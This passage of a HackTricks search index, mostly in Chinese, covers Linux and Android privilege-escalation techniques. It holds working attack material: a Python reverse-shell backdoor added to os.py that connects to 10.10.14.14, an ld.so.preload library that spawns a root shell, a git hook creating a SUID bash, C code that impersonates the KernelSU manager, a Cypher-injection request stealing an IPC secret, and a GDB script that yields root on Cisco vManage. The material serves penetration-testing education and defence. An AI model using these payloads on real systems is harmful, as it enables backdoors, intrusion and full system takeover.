a new shell\\n~/.bash_logout # if it exists, read when the login shell exits\\n~/.zlogin #zsh shell\\n~/.zshrc #zsh shell","breadcrumbs":"Linux Privilege Escalation » Shell files","id":"1484","title":"Shell files"},"1485":{"body":"你还应该检查文件名或文件内容中包含单词 \\" password \\" 的文件,也要在 logs 中检查 IPs 和 emails,或 hashes regexps。 我不会在这里列出如何完成所有这些检查,但如果你感兴趣,可以查看 linpeas 执行的最后几项检查。","breadcrumbs":"Linux Privilege Escalation » Generic Creds Search/Regex","id":"1485","title":"Generic Creds Search/Regex"},"1486":{"body":"","breadcrumbs":"Linux Privilege Escalation » 可写文件","id":"1486","title":"可写文件"},"1487":{"body":"如果你知道 python 脚本将从 哪个位置 被执行,并且你 可以在该文件夹中写入 或者你可以 修改 python libraries ,你就可以修改 OS library 并为其植入 backdoor(如果你能写入 python 脚本将被执行的位置,复制并粘贴 os.py library)。 要 backdoor the library ,只需在 os.py library 的末尾添加以下行(change IP and PORT): python import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\"10.10.14.14\\",5678));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\"/bin/sh\\",\\"-i\\"]);","breadcrumbs":"Linux Privilege Escalation » Python library hijacking","id":"1487","title":"Python library hijacking"},"1488":{"body":"logrotate 中的一个漏洞允许对日志文件或其父目录具有 write permissions 的用户可能获得提权。因为 logrotate 通常以 root 运行,可能被操纵去执行任意文件,尤其是在像 /etc/bash_completion.d/ 这样的目录中。重要的是不仅检查 /var/log 中的权限,还要检查任何应用了日志轮换的目录。 tip 该漏洞影响 logrotate 版本 3.18.0 及更早版本 关于该漏洞的更多详细信息见此页面: https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition . 你可以使用 logrotten 来利用此漏洞。 该漏洞与 CVE-2016-1247 (nginx logs) 非常相似,所以每当你发现可以修改日志时,检查谁在管理这些日志,并检查是否可以通过将日志替换为 symlinks 来提权。","breadcrumbs":"Linux Privilege Escalation » Logrotate exploitation","id":"1488","title":"Logrotate exploitation"},"1489":{"body":"Vulnerability reference: https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f 如果由于任何原因,某用户能够在 /etc/sysconfig/network-scripts 中 write 一个 ifcf- 脚本,或者能够 adjust 一个已有的脚本,那么你的 system is pwned 。 Network scripts,例如 ifcg-eth0 ,用于网络连接。它们看起来完全像 .INI 文件。然而,它们在 Linux 上被 Network Manager (dispatcher.d) ~sourced~。 在我的案例中,这些 network scripts 中的 NAME= 属性处理不正确。如果名称中有 white/blank space the system tries to execute the part after the white/blank space 。这意味着 everything after the first blank space is executed as root 。 For example: /etc/sysconfig/network-scripts/ifcfg-1337 bash NAME=Network /bin/id\\nONBOOT=yes\\nDEVICE=eth0 ( 注意 Network 与 /bin/id 之间的空格 )","breadcrumbs":"Linux Privilege Escalation » /etc/sysconfig/network-scripts/ (Centos/Redhat)","id":"1489","title":"/etc/sysconfig/network-scripts/ (Centos/Redhat)"},"149":{"body":"Take into account that when a UDP packet is sent to a device that do not have the requested port an ICMP (Port Unreachable) is sent.","breadcrumbs":"Pentesting Network » 主动发现说明","id":"149","title":"主动发现说明"},"1490":{"body":"目录 /etc/init.d 存放用于 System V init (SysVinit) 的 脚本 ,这是 经典的 Linux 服务管理系统 。其中包含用于 start、stop、restart,有时还有 reload 服务的脚本。这些脚本可以直接执行,或通过位于 /etc/rc?.d/ 的符号链接来触发。在 Redhat 系统中,另一条常见路径是 /etc/rc.d/init.d。 另一方面,/etc/init 与 Upstart 相关,这是由 Ubuntu 引入的较新的 service management 方式,使用配置文件来管理服务。尽管很多系统已迁移到 Upstart,但由于 Upstart 中具有兼容层,SysVinit 脚本仍会与 Upstart 配置一起被使用。 systemd 是一种现代的初始化与服务管理器,提供了按需启动守护进程、自动挂载管理以及系统状态快照等高级功能。它将文件组织为分发包使用的 /usr/lib/systemd/,以及供管理员修改的 /etc/systemd/system/,从而简化了系统管理。","breadcrumbs":"Linux Privilege Escalation » init、init.d、systemd 和 rc.d","id":"1490","title":"init、init.d、systemd 和 rc.d"},"1491":{"body":"","breadcrumbs":"Linux Privilege Escalation » Other Tricks","id":"1491","title":"Other Tricks"},"1492":{"body":"NFS no_root_squash/no_all_squash misconfiguration PE","breadcrumbs":"Linux Privilege Escalation » NFS Privilege escalation","id":"1492","title":"NFS Privilege escalation"},"1493":{"body":"Escaping from Jails","breadcrumbs":"Linux Privilege Escalation » Escaping from restricted Shells","id":"1493","title":"Escaping from restricted Shells"},"1494":{"body":"Cisco - vmanage","breadcrumbs":"Linux Privilege Escalation » Cisco - vmanage","id":"1494","title":"Cisco - vmanage"},"1495":{"body":"Android rooting frameworks commonly hook a syscall to expose privileged kernel functionality to a userspace manager. Weak manager authentication (e.g., signature checks based on FD-order or poor password schemes) can enable a local app to impersonate the manager and escalate to root on already-rooted devices. Learn more and exploitation details here: Android Rooting Frameworks Manager Auth Bypass Syscall Hook","breadcrumbs":"Linux Privilege Escalation » Android rooting frameworks: manager-channel abuse","id":"1495","title":"Android rooting frameworks: manager-channel abuse"},"1496":{"body":"https://github.com/a13xp0p0v/kconfig-hardened-check https://github.com/a13xp0p0v/linux-kernel-defence-map","breadcrumbs":"Linux Privilege Escalation » Kernel Security Protections","id":"1496","title":"Kernel Security Protections"},"1497":{"body":"Static impacket binaries","breadcrumbs":"Linux Privilege Escalation » More help","id":"1497","title":"More help"},"1498":{"body":"","breadcrumbs":"Linux Privilege Escalation » Linux/Unix Privesc Tools","id":"1498","title":"Linux/Unix Privesc Tools"},"1499":{"body":"LinEnum : https://github.com/rebootuser/LinEnum (-t option) Enumy : https://github.com/luke-goddard/enumy Unix Privesc Check: http://pentestmonkey.net/tools/audit/unix-privesc-check Linux Priv Checker: www.securitysift.com/download/linuxprivchecker.py BeeRoot: https://github.com/AlessandroZ/BeRoot/tree/master/Linux Kernelpop: Enumerate kernel vulns ins linux and MAC https://github.com/spencerdodd/kernelpop Mestaploit: multi/recon/local_exploit_suggester Linux Exploit Suggester: https://github.com/mzet-/linux-exploit-suggester EvilAbigail (physical access): https://github.com/GDSSecurity/EvilAbigail Recopilation of more scripts : https://github.com/1N3/PrivEsc","breadcrumbs":"Linux Privilege Escalation » Best tool to look for Linux local privilege escalation vectors: LinPEAS","id":"1499","title":"Best tool to look for Linux local privilege escalation vectors: LinPEAS"},"15":{"body":"请查看: HackTricks Values & FAQ","breadcrumbs":"HackTricks » 许可证和免责声明","id":"15","title":"许可证和免责声明"},"150":{"body":"ARP 包用于发现网络中正在使用的 IP。主机必须对每个可能的 IP 地址发送请求,只有正在使用的地址才会响应。","breadcrumbs":"Pentesting Network » ARP discover","id":"150","title":"ARP discover"},"1500":{"body":"https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ https://payatu.com/guide-linux-privilege-escalation/ https://pen-testing.sans.org/resources/papers/gcih/attack-defend-linux-privilege-escalation-techniques-2016-152744 http://0x90909090.blogspot.com/2015/07/no-one-expect-command-execution.html https://touhidshaikh.com/blog/?p=827 https://github.com/sagishahar/lpeworkshop/blob/master/Lab%20Exercises%20Walkthrough%20-%20Linux.pdf https://github.com/frizb/Linux-Privilege-Escalation https://github.com/lucyoa/kernel-exploits https://github.com/rtcrowley/linux-private-i https://www.linux.com/news/what-socket/ https://muzec0318.github.io/posts/PG/peppo.html https://www.linuxjournal.com/article/7744 https://blog.certcube.com/suid-executables-linux-privilege-escalation/ https://juggernaut-sec.com/sudo-part-2-lpe https://linuxconfig.org/how-to-manage-acls-on-linux https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f https://www.linode.com/docs/guides/what-is-systemd/ 0xdf – HTB Eureka (bash arithmetic injection via logs, overall chain) GNU Bash Manual – BASH_ENV (non-interactive startup file) 0xdf – HTB Environment (sudo env_keep BASH_ENV → root) tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » References","id":"1500","title":"References"},"1501":{"body":"Reading time: 13 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 像 KernelSU、APatch、SKRoot 和 Magisk 这样的 Rooting 框架经常会修补 Linux/Android 内核,并通过挂钩的系统调用向特权用户空间“管理”应用程序暴露特权功能。如果管理身份验证步骤存在缺陷,任何本地应用程序都可以访问此通道,并在已经获得 root 权限的设备上提升特权。 本页抽象了公共研究中发现的技术和陷阱(特别是 Zimperium 对 KernelSU v0.5.7 的分析),以帮助红队和蓝队理解攻击面、利用原语和稳健的缓解措施。","breadcrumbs":"Linux Privilege Escalation » Android Rooting Frameworks Manager Auth Bypass Syscall Hook » Android Rooting Frameworks (KernelSU/Magisk) Manager Auth Bypass & Syscall Hook Abuse","id":"1501","title":"Android Rooting Frameworks (KernelSU/Magisk) Manager Auth Bypass & Syscall Hook Abuse"},"1502":{"body":"内核模块/补丁挂钩一个系统调用(通常是 prctl)以接收来自用户空间的“命令”。 协议通常是:magic_value, command_id, arg_ptr/len ... 用户空间管理应用程序首先进行身份验证(例如,CMD_BECOME_MANAGER)。一旦内核将调用者标记为受信任的管理者,就会接受特权命令: 授予调用者 root 权限(例如,CMD_GRANT_ROOT) 管理 su 的允许列表/拒绝列表 调整 SELinux 策略(例如,CMD_SET_SEPOLICY) 查询版本/配置 由于任何应用程序都可以调用系统调用,因此管理身份验证的正确性至关重要。 示例(KernelSU 设计): 挂钩的系统调用:prctl 转发到 KernelSU 处理程序的魔法值:0xDEADBEEF 命令包括:CMD_BECOME_MANAGER, CMD_GET_VERSION, CMD_ALLOW_SU, CMD_SET_SEPOLICY, CMD_GRANT_ROOT 等。","breadcrumbs":"Linux Privilege Escalation » Android Rooting Frameworks Manager Auth Bypass Syscall Hook » 架构模式:挂钩的系统调用管理通道","id":"1502","title":"架构模式:挂钩的系统调用管理通道"},"1503":{"body":"当用户空间调用 prctl(0xDEADBEEF, CMD_BECOME_MANAGER, data_dir_path, ...) 时,KernelSU 验证: 路径前缀检查 提供的路径必须以调用者 UID 的预期前缀开头,例如 /data/data/ 或 /data/user//。 参考:core_hook.c (v0.5.7) 路径前缀逻辑。 所有权检查 路径必须由调用者 UID 拥有。 参考:core_hook.c (v0.5.7) 所有权逻辑。 通过 FD 表扫描进行 APK 签名检查 遍历调用进程的打开文件描述符(FD)。 选择第一个路径匹配 /data/app/*/base.apk 的文件。 解析 APK v2 签名并与官方管理证书进行验证。 参考:manager.c(遍历 FDs),apk_sign.c(APK v2 验证)。 如果所有检查都通过,内核会暂时缓存管理者的 UID,并接受来自该 UID 的特权命令,直到重置。","breadcrumbs":"Linux Privilege Escalation » Android Rooting Frameworks Manager Auth Bypass Syscall Hook » KernelSU v0.5.7 身份验证流程(如实现)","id":"1503","title":"KernelSU v0.5.7 身份验证流程(如实现)"},"1504":{"body":"如果签名检查绑定到在进程 FD 表中找到的“第一个匹配的 /data/app/*/base.apk”,则实际上并没有验证调用者自己的包。攻击者可以预先放置一个合法签名的 APK(真正的管理者的),使其在 FD 列表中比他们自己的 base.apk 更早出现。 这种间接信任使得一个非特权应用程序可以在没有拥有管理者签名密钥的情况下冒充管理者。 利用的关键属性: FD 扫描并不绑定到调用者的包身份;它仅仅是模式匹配路径字符串。 open() 返回最低可用的 FD。通过首先关闭低编号的 FD,攻击者可以控制顺序。 过滤器仅检查路径是否匹配 /data/app/*/base.apk,而不是它是否对应于调用者的已安装包。","breadcrumbs":"Linux Privilege Escalation » Android Rooting Frameworks Manager Auth Bypass Syscall Hook » 漏洞类别:信任“第一个匹配的 APK”来自 FD 迭代","id":"1504","title":"漏洞类别:信任“第一个匹配的 APK”来自 FD 迭代"},"1505":{"body":"设备已经被一个易受攻击的 Rooting 框架(例如,KernelSU v0.5.7)获得 root 权限。 攻击者可以在本地运行任意非特权代码(Android 应用程序进程)。 真实的管理者尚未进行身份验证(例如,在重启后)。一些框架在成功后缓存管理者 UID;你必须赢得这场竞赛。","breadcrumbs":"Linux Privilege Escalation » Android Rooting Frameworks Manager Auth Bypass Syscall Hook » 攻击前提条件","id":"1505","title":"攻击前提条件"},"1506":{"body":"高层步骤: 构建一个有效的路径到你自己的应用数据目录,以满足前缀和所有权检查。 确保一个真实的 KernelSU 管理者 base.apk 在一个低编号的 FD 上打开,低于你自己的 base.apk。 调用 prctl(0xDEADBEEF, CMD_BECOME_MANAGER, , ...) 以通过检查。 发出特权命令,如 CMD_GRANT_ROOT, CMD_ALLOW_SU, CMD_SET_SEPOLICY 以保持提升。 关于步骤 2(FD 排序)的实用说明: 通过遍历 /proc/self/fd 符号链接来识别你自己 /data/app/*/base.apk 的进程 FD。 关闭一个低 FD(例如,stdin,fd 0),并首先打开合法的管理 APK,以便它占据 fd 0(或任何低于你自己 base.apk fd 的索引)。 将合法的管理 APK 与你的应用捆绑,以便其路径满足内核的简单过滤器。例如,将其放在匹配 /data/app/*/base.apk 的子路径下。 示例代码片段(Android/Linux,仅供说明): 枚举打开的 FDs 以定位 base.apk 条目: c #include \\n#include \\n#include \\n#include int find_first_baseapk_fd(char out_path[PATH_MAX]) {\\nDIR *d = opendir(\\"/proc/self/fd\\");\\nif (!d) return -1;\\nstruct dirent *e; char link[PATH_MAX]; char p[PATH_MAX];\\nint best_fd = -1;\\nwhile ((e = readdir(d))) {\\nif (e->d_name[0] == \'.\') continue;\\nint fd = atoi(e->d_name);\\nsnprintf(link, sizeof(link), \\"/proc/self/fd/%d\\", fd);\\nssize_t n = readlink(link, p, sizeof(p)-1);\\nif (n <= 0) continue; p[n] = \'\\\\0\';\\nif (strstr(p, \\"/data/app/\\") && strstr(p, \\"/base.apk\\")) {\\nif (best_fd < 0 || fd < best_fd) {\\nbest_fd = fd; strncpy(out_path, p, PATH_MAX);\\n}\\n}\\n}\\nclosedir(d);\\nreturn best_fd; // First (lowest) matching fd\\n} 强制较低编号的文件描述符指向合法的管理器APK: c #include \\n#include void preopen_legit_manager_lowfd(const char *legit_apk_path) {\\n// Reuse stdin (fd 0) if possible so the next open() returns 0\\nclose(0);\\nint fd = open(legit_apk_path, O_RDONLY);\\n(void)fd; // fd should now be 0 if available\\n} 通过 prctl hook 进行管理者身份验证: c #include \\n#include #define KSU_MAGIC 0xDEADBEEF\\n#define CMD_BECOME_MANAGER 0x100 // Placeholder; command IDs are framework-specific static inline long ksu_call(unsigned long cmd, unsigned long arg2,\\nunsigned long arg3, unsigned long arg4) {\\nreturn prctl(KSU_MAGIC, cmd, arg2, arg3, arg4);\\n} int become_manager(const char *my_data_dir) {\\nlong result = -1;\\n// arg2: command, arg3: pointer to data path (userspace->kernel copy), arg4: optional result ptr\\nresult = ksu_call(CMD_BECOME_MANAGER, (unsigned long)my_data_dir, 0, 0);\\nreturn (int)result;\\n} 成功后,特权命令(示例): CMD_GRANT_ROOT:将当前进程提升为root CMD_ALLOW_SU:将您的包/UID添加到持久su的白名单中 CMD_SET_SEPOLICY:根据框架的支持调整SELinux策略 竞态/持久性提示: 在AndroidManifest中注册BOOT_COMPLETED接收器(RECEIVE_BOOT_COMPLETED),以便在重启后尽早启动并在真实管理器之前尝试身份验证。","breadcrumbs":"Linux Privilege Escalation » Android Rooting Frameworks Manager Auth Bypass Syscall Hook » 利用概述(KernelSU v0.5.7)","id":"1506","title":"利用概述(KernelSU v0.5.7)"},"1507":{"body":"对于框架开发者: 将身份验证绑定到调用者的包/UID,而不是任意FD: 从UID解析调用者的包,并通过PackageManager验证与已安装包的签名,而不是扫描FD。 如果仅限于内核,使用稳定的调用者身份(任务凭证),并在init/userspace助手管理的稳定真实来源上进行验证,而不是进程FD。 避免将路径前缀检查作为身份;调用者可以轻易满足这些条件。 在通道上使用基于随机数的挑战-响应,并在启动或关键事件时清除任何缓存的管理器身份。 在可行的情况下,考虑基于binder的认证IPC,而不是重载通用系统调用。 对于防御者/蓝队: 检测root框架和管理进程的存在;如果您有内核遥测,监控带有可疑魔法常量(例如,0xDEADBEEF)的prctl调用。 在管理的设备上,阻止或警报来自不受信任包的启动接收器,这些接收器在启动后迅速尝试特权管理命令。 确保设备更新到已修补的框架版本;在更新时使缓存的管理器ID失效。 攻击的局限性: 仅影响已经使用易受攻击框架root的设备。 通常需要在合法管理器进行身份验证之前进行重启/竞态窗口(某些框架在重置之前缓存管理器UID)。","breadcrumbs":"Linux Privilege Escalation » Android Rooting Frameworks Manager Auth Bypass Syscall Hook » 检测和缓解指导","id":"1507","title":"检测和缓解指导"},"1508":{"body":"基于密码的身份验证(例如,历史APatch/SKRoot构建)如果密码可猜测/暴力破解或验证存在缺陷,可能会很弱。 基于包/签名的身份验证(例如,KernelSU)原则上更强,但必须绑定到实际调用者,而不是像FD扫描这样的间接伪影。 Magisk:CVE-2024-48336(MagiskEoP)显示,即使是成熟的生态系统也可能容易受到身份欺骗,导致在管理器上下文中执行代码。","breadcrumbs":"Linux Privilege Escalation » Android Rooting Frameworks Manager Auth Bypass Syscall Hook » 各框架相关说明","id":"1508","title":"各框架相关说明"},"1509":{"body":"Zimperium – The Rooting of All Evil: Security Holes That Could Compromise Your Mobile Device KernelSU v0.5.7 – core_hook.c path checks (L193, L201) KernelSU v0.5.7 – manager.c FD iteration/signature check (L43+) KernelSU – apk_sign.c APK v2 verification (main) KernelSU project APatch SKRoot MagiskEoP – CVE-2024-48336 KSU PoC demo video (Wistia) tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Android Rooting Frameworks Manager Auth Bypass Syscall Hook » 参考文献","id":"1509","title":"参考文献"},"151":{"body":"Bettercap send a MDNS request (each X ms) asking for _services_.dns-sd._udp.local the machine that see this paket usually answer this request. Then, it only searchs for machine answering to \\"services\\". 工具 Avahi-browser (--all) Bettercap (net.probe.mdns) Responder","breadcrumbs":"Pentesting Network » mDNS (multicast DNS)","id":"151","title":"mDNS (multicast DNS)"},"1510":{"body":"Reading time: 3 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Arbitrary File Write to Root » 任意文件写入根目录","id":"1510","title":"任意文件写入根目录"},"1511":{"body":"该文件的行为类似于 LD_PRELOAD 环境变量,但它也适用于 SUID 二进制文件 。 如果您可以创建或修改它,您可以简单地添加一个 将在每个执行的二进制文件中加载的库的路径 。 例如:echo \\"/tmp/pe.so\\" > /etc/ld.so.preload c #include \\n#include \\n#include void _init() {\\nunlink(\\"/etc/ld.so.preload\\");\\nsetgid(0);\\nsetuid(0);\\nsystem(\\"/bin/bash\\");\\n}\\n//cd /tmp\\n//gcc -fPIC -shared -o pe.so pe.c -nostartfiles","breadcrumbs":"Linux Privilege Escalation » Arbitrary File Write to Root » /etc/ld.so.preload","id":"1511","title":"/etc/ld.so.preload"},"1512":{"body":"Git hooks 是 在 git 仓库中 各种事件 发生时 运行的脚本 ,例如当创建提交、合并时... 所以如果一个 特权脚本或用户 经常执行这些操作,并且可以 在 .git 文件夹中写入 ,这可以被用来 提权 。 例如,可以在 git 仓库的 .git/hooks 中 生成一个脚本 ,这样每当创建新提交时它就会被执行: bash echo -e \'#!/bin/bash\\\\n\\\\ncp /bin/bash /tmp/0xdf\\\\nchown root:root /tmp/0xdf\\\\nchmod 4777 /tmp/b\' > pre-commit\\nchmod +x pre-commit","breadcrumbs":"Linux Privilege Escalation » Arbitrary File Write to Root » Git hooks","id":"1512","title":"Git hooks"},"1513":{"body":"TODO","breadcrumbs":"Linux Privilege Escalation » Arbitrary File Write to Root » Cron & Time files","id":"1513","title":"Cron & Time files"},"1514":{"body":"TODO","breadcrumbs":"Linux Privilege Escalation » Arbitrary File Write to Root » Service & Socket files","id":"1514","title":"Service & Socket files"},"1515":{"body":"位于 /proc/sys/fs/binfmt_misc 的文件指示哪个二进制文件应该执行哪种类型的文件。TODO: 检查滥用此功能以在打开常见文件类型时执行反向 shell 的要求。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Arbitrary File Write to Root » binfmt_misc","id":"1515","title":"binfmt_misc"},"1516":{"body":"Reading time: 8 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Cisco - vmanage » Cisco - vmanage","id":"1516","title":"Cisco - vmanage"},"1517":{"body":"(来自 https://www.synacktiv.com/en/publications/pentesting-cisco-sd-wan-part-1-attacking-vmanage.html ) 在浏览了一些与 confd 及其不同二进制文件相关的 文档 后(可以通过 Cisco 网站上的账户访问),我们发现要验证 IPC 套接字,它使用位于 /etc/confd/confd_ipc_secret 的一个秘密: vmanage:~$ ls -al /etc/confd/confd_ipc_secret -rw-r----- 1 vmanage vmanage 42 Mar 12 15:47 /etc/confd/confd_ipc_secret 记得我们的 Neo4j 实例吗?它在 vmanage 用户的权限下运行,因此允许我们利用之前的漏洞检索文件: GET /dataservice/group/devices?groupId=test\\\\\\\\\\\\\'<>\\\\\\"test\\\\\\\\\\\\\\\\\\\\\\")+RETURN+n+UNION+LOAD+CSV+FROM+\\\\\\"file:///etc/confd/confd_ipc_secret\\\\\\"+AS+n+RETURN+n+//+\' HTTP/1.1 Host: vmanage-XXXXXX.viptela.net [...] \\"data\\":[{\\"n\\":[\\"3708798204-3215954596-439621029-1529380576\\"]}]} confd_cli 程序不支持命令行参数,但会调用 /usr/bin/confd_cli_user 并传递参数。因此,我们可以直接使用我们自己的参数调用 /usr/bin/confd_cli_user。但是以我们当前的权限无法读取它,因此我们必须从 rootfs 中检索它并使用 scp 复制,阅读帮助,并使用它获取 shell: vManage:~$ echo -n \\"3708798204-3215954596-439621029-1529380576\\" > /tmp/ipc_secret vManage:~$ export CONFD_IPC_ACCESS_FILE=/tmp/ipc_secret vManage:~$ /tmp/confd_cli_user -U 0 -G 0 Welcome to Viptela CLI admin connected from 127.0.0.1 using console on vManage vManage# vshell vManage:~# id uid=0(root) gid=0(root) groups=0(root)","breadcrumbs":"Linux Privilege Escalation » Cisco - vmanage » Path 1","id":"1517","title":"Path 1"},"1518":{"body":"(Example from https://medium.com/walmartglobaltech/hacking-cisco-sd-wan-vmanage-19-2-2-from-csrf-to-remote-code-execution-5f73e2913e77 ) synacktiv团队的博客¹描述了一种优雅的方法来获取root shell,但缺点是需要获取/usr/bin/confd_cli_user的副本,该副本仅对root可读。我找到了一种无需如此麻烦即可提升到root的方法。 当我反汇编/usr/bin/confd_cli二进制文件时,我观察到了以下内容: vmanage:~$ objdump -d /usr/bin/confd_cli\\n… snipped …\\n40165c: 48 89 c3 mov %rax,%rbx\\n40165f: bf 1c 31 40 00 mov $0x40311c,%edi\\n401664: e8 17 f8 ff ff callq 400e80 \\n401669: 49 89 c4 mov %rax,%r12\\n40166c: 48 85 db test %rbx,%rbx\\n40166f: b8 dc 30 40 00 mov $0x4030dc,%eax\\n401674: 48 0f 44 d8 cmove %rax,%rbx\\n401678: 4d 85 e4 test %r12,%r12\\n40167b: b8 e6 30 40 00 mov $0x4030e6,%eax\\n401680: 4c 0f 44 e0 cmove %rax,%r12\\n401684: e8 b7 f8 ff ff callq 400f40 <-- HERE\\n401689: 89 85 50 e8 ff ff mov %eax,-0x17b0(%rbp)\\n40168f: e8 6c f9 ff ff callq 401000 <-- HERE\\n401694: 89 85 44 e8 ff ff mov %eax,-0x17bc(%rbp)\\n40169a: 8b bd 68 e8 ff ff mov -0x1798(%rbp),%edi\\n4016a0: e8 7b f9 ff ff callq 401020 \\n4016a5: c6 85 cf f7 ff ff 00 movb $0x0,-0x831(%rbp)\\n4016ac: 48 85 c0 test %rax,%rax\\n4016af: 0f 84 ad 03 00 00 je 401a62 \\n4016b5: ba ff 03 00 00 mov $0x3ff,%edx\\n4016ba: 48 89 c6 mov %rax,%rsi\\n4016bd: 48 8d bd d0 f3 ff ff lea -0xc30(%rbp),%rdi\\n4016c4: e8 d7 f7 ff ff callq 400ea0 <*ABS*+0x32e9880f0b@plt>\\n… snipped … 当我运行“ps aux”时,我观察到以下内容( note -g 100 -u 107 ) vmanage:~$ ps aux\\n… snipped …\\nroot 28644 0.0 0.0 8364 652 ? Ss 18:06 0:00 /usr/lib/confd/lib/core/confd/priv/cmdptywrapper -I 127.0.0.1 -p 4565 -i 1015 -H /home/neteng -N neteng -m 2232 -t xterm-256color -U 1358 -w 190 -h 43 -c /home/neteng -g 100 -u 1007 bash\\n… snipped … 我假设“confd_cli”程序将从登录用户收集的用户 ID 和组 ID 传递给“cmdptywrapper”应用程序。 我的第一次尝试是直接运行“cmdptywrapper”,并提供 -g 0 -u 0,但失败了。似乎在这个过程中创建了一个文件描述符 (-i 1015),我无法伪造它。 正如 synacktiv 的博客中提到的(最后一个例子),confd_cli 程序不支持命令行参数,但我可以通过调试器影响它,幸运的是系统中包含 GDB。 我创建了一个 GDB 脚本,强制 API getuid 和 getgid 返回 0。由于我已经通过反序列化 RCE 获得了“vmanage”权限,我有权限直接读取 /etc/confd/confd_ipc_secret。 root.gdb: set environment USER=root\\ndefine root\\nfinish\\nset $rax=0\\ncontinue\\nend\\nbreak getuid\\ncommands\\nroot\\nend\\nbreak getgid\\ncommands\\nroot\\nend\\nrun 控制台输出: vmanage:/tmp$ gdb -x root.gdb /usr/bin/confd_cli\\nGNU gdb (GDB) 8.0.1\\nCopyright (C) 2017 Free Software Foundation, Inc.\\nLicense GPLv3+: GNU GPL version 3 or later \\nThis is free software: you are free to change and redistribute it.\\nThere is NO WARRANTY, to the extent permitted by law. Type \\"show copying\\"\\nand \\"show warranty\\" for details.\\nThis GDB was configured as \\"x86_64-poky-linux\\".\\nType \\"show configuration\\" for configuration details.\\nFor bug reporting instructions, please see:\\n.\\nFind the GDB manual and other documentation resources online at:\\n.\\nFor help, type \\"help\\".\\nType \\"apropos word\\" to search for commands related to \\"word\\"...\\nReading symbols from /usr/bin/confd_cli...(no debugging symbols found)...done.\\nBreakpoint 1 at 0x400f40\\nBreakpoint 2 at 0x401000Breakpoint 1, getuid () at ../sysdeps/unix/syscall-template.S:59\\n59 T_PSEUDO_NOERRNO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)\\n0x0000000000401689 in ?? ()Breakpoint 2, getgid () at ../sysdeps/unix/syscall-template.S:59\\n59 T_PSEUDO_NOERRNO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)\\n0x0000000000401694 in ?? ()Breakpoint 1, getuid () at ../sysdeps/unix/syscall-template.S:59\\n59 T_PSEUDO_NOERRNO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)\\n0x0000000000401871 in ?? ()\\nWelcome to Viptela CLI\\nroot connected from 127.0.0.1 using console on vmanage\\nvmanage# vshell\\nbash-4.4# whoami ; id\\nroot\\nuid=0(root) gid=0(root) groups=0(root)\\nbash-4.4# tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 